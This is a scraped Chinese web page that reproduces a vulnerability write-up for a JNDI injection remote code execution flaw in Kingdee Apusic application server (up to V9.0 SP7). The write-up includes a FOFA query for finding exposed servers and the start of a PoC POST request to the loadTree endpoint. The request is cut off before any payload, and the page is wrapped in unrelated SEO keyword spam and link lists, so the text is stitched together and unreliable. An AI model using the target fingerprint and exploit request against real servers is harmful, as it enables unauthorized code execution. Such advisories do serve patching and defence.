当前位置: 首页 > news >正文

重庆高端网站建设b站推广网站2024下载

重庆高端网站建设,b站推广网站2024下载,企业做门户网站的重要性,黑龙江省建设厅网站0x01 产品简介 金蝶Apusic应用服务器是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。 0x02 漏洞概述 由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份…

0x01 产品简介

金蝶Apusic应用服务器是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

0x02 漏洞概述

由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份补丁已出,金蝶EAS也存在类似漏洞,只是路径不一样)

0x03 影响范围

影响版本

金蝶Apusic应用服务器 <= V9.0 SP7

不受影响版本

金蝶Apusic应用服务器 > V9.0 SP7

0x04 复现环境

FOFA:app="Apusic应用服务器"

0x05 漏洞复现

PoC

POST /admin//protect/jndi/loadTree HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh
http://www.dinnco.com/news/82500.html

相关文章:

  • 济南网站开发薪酬seo如何优化一个网站
  • 建网站公司关键词搜索挖掘爱网站
  • 车陂手机网站建设报价seo有哪些作用
  • 深圳做网站要多少技能培训有哪些科目
  • 东营聊城网站建设百度问答平台
  • 长春网站建设q479185700惠俄罗斯网络攻击数量增长了80%
  • 大气好看的网站国家市场监管总局官网
  • wordpress 在线阅读pdf上海关键词优化推荐
  • wordpress 商品表单网站优化最为重要的内容是
  • jsp网站建设项目实战课后焦作关键词优化排名
  • 安丘网站建设aqfeifan公司怎么做网站推广
  • 17zwd一起做网站官网北京seo网站设计
  • 乌克兰网站建设网络推广有多少种方法
  • 可以做同城活动的网站关键词林俊杰
  • 查网站是什么公司做的职业培训机构需要什么资质
  • 做网站每年交服务费域名推荐
  • 网站开发攻克时间关键词查询神器
  • 网站制作参考其他网站会侵权吗seo博客大全
  • 做动态网站 需要哪些知识今日油价最新
  • 深圳市龙华区最新疫情北京快速优化排名
  • 郴州网站建设公司简介桂平seo关键词优化
  • 专业网站建设制作长沙岳麓区
  • 网站建设推广优化国家免费技能培训
  • laravel网站怎么做项目北京seo关键词排名优化
  • wordpress hta长沙seo优化报价
  • 在线app开发网站建设网络推广员工作内容
  • 销售网站开发与设计现状58同城推广
  • 免费net网站空间免费关键词挖掘网站
  • 诸城企业网站建设公司网站建设费
  • 在哪个网站可以做车年检新闻发稿发布平台